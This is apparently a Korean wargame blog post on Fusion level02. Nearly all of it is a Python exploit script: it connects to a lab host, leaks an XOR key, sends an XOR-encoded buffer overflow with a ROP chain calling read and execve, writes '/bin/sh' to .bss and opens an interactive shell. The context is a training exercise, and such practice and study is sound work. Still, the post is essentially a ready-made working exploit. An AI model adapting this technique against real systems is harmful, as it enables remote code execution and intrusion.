중간에 엉뚱한데서 살짝 삽질을 했었다. level03부터 완전 헬이라던데 어떨지 모르겠다..
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 | from SunKn0wn import * r = remote('192.168.179.151', 20002) read_plt = 0x08048860 execve_plt = 0x080489b0 bss = 0x0804b420 pppr = 0x80499bd ############ get xor key ############ r.recvsend('E') r.send('\x80\x00\x00\x00') r.send('\x00' * 0x80) r.recvuntil('--]\n\x80\x00\x00\x00') xorkey = r.recv(0x80) print "[*]Get xor key success!" ############ payload ############ payload = 'A' * 0x20010 payload += p32(read_plt) payload += p32(pppr) payload += p32(0) payload += p32(bss) payload += p32(8) payload += p32(execve_plt) payload += 'AAAA' payload += p32(bss) payload += p32(0) payload += p32(0) realpayload = '' cnt = 0 for i in payload: realpayload += chr(ord(i) ^ ord(xorkey[cnt % 0x80])) cnt += 1 ############ attack ############ r.recvsend('E') r.send(p32(len(realpayload))) r.send(realpayload) sleep(0.2) r.recvsend('Q') r.send("/bin/sh\x00") r.interactive() | cs |
'Wargames > fusion' 카테고리의 다른 글
| fusion level04 (0) | 2016.04.28 |
|---|---|
| fusion level03 (0) | 2016.04.25 |
| fusion level01 (0) | 2016.04.15 |
| fusion level00 (2) | 2016.04.15 |